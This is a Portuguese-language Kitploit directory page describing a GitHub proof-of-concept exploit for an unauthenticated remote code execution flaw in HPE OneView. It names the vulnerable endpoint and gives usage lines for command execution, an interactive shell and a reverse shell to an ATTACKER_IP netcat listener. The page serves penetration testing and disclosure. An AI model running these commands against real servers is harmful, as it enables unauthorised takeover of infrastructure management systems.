Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-37164-PoC — PoC para CVE-2025-37164 | Kitploit
Ferramentas/GitHubGitHub/g0vguy/cve-2025-37164-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoRed Teaming
GitHubg0vguy/cve-2025-37164-poc

CVE-2025-37164-PoC

PoC para CVE-2025-37164

Ver Repositório
62há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-37164 - HPE OneView PoC de RCE Não Autenticada

Exploit de Prova de Conceito para CVE-2025-37164, uma vulnerabilidade crítica (CVSS 10.0) de execução remota de código não autenticada no HPE OneView.

AVISO LEGAL

ESTE SOFTWARE É FORNECIDO APENAS PARA FINS EDUCACIONAIS E DE TESTE DE SEGURANÇA AUTORIZADOS.

  • Use apenas em sistemas que você possui ou para os quais tenha permissão explícita por escrito para testar
  • O acesso não autorizado a sistemas de computador é ilegal
  • O autor não é responsável por qualquer uso indevido ou dano causado por esta ferramenta
  • Esta ferramenta é para pesquisa defensiva de segurança e testes de penetração em ambientes controlados

Detalhes da Vulnerabilidade

  • ID CVE: CVE-2025-37164
  • Pontuação CVSS: 10.0 (CRÍTICA)
  • Fornecedor: Hewlett Packard Enterprise (HPE)
  • Produto: HPE OneView (versões anteriores à 11.0)
  • Tipo: Execução Remota de Código Não Autenticada
  • Correção: Atualize para HPE OneView 11.0 ou superior

Análise Técnica: A vulnerabilidade existe no endpoint PUT /rest/id-pools/executeCommand que não requer autenticação e passa a entrada controlada pelo usuário diretamente para Runtime.exec().

Pré-requisitos

  • Python 3.6+
  • Biblioteca requests (pip install requests)
  • Instância vulnerável do HPE OneView (com o recurso 'id pools' habilitado)

Uso

root@kitploit:~
# Test if target is vulnerable
python3 cve-2025-37164.py -t http://target-ip --check

# Execute a single command
python3 cve-2025-37164.py -t http://target-ip -c "id"

# Interactive command shell
python3 cve-2025-37164.py -t http://target-ip -i

# Attempt reverse shell (requires listener)
# On attacker machine: nc -lvnp 4444
python3 cve-2025-37164.py -t http://target-ip --lhost ATTACKER_IP --lport 4444
Baixar ferramenta